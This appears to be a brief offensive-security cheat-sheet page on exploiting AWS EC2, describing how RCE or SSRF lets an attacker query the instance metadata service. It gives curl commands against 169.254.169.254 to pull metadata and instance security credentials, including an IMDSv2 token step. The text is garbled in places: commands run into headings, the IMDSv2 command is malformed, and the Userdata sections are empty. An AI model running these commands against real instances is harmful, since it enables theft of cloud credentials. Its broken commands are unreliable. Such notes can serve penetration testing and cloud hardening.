Exploitation
AWS EC2 Exploitation
Initial Access can happen by RCE or SSRF
Metadata can be used to exfiltrate information from the instance
Remote Code Execution
AWS Metadata
If we have remote code execution or SSRF, we can grab metadata information
curl http://169.254.169.254/latest/meta-dataGrabbing the keys to access the instance
curl http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentialsGrabbing the keys in metadata version 2
TOKEN='curl -X PUT "http://169.254.169.254/latest/ api /token" -H "X-aws-ec2-metadata-token-ttl-seconds:' && curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-dataAWS Userdata
Version 1
Version 2
Last updated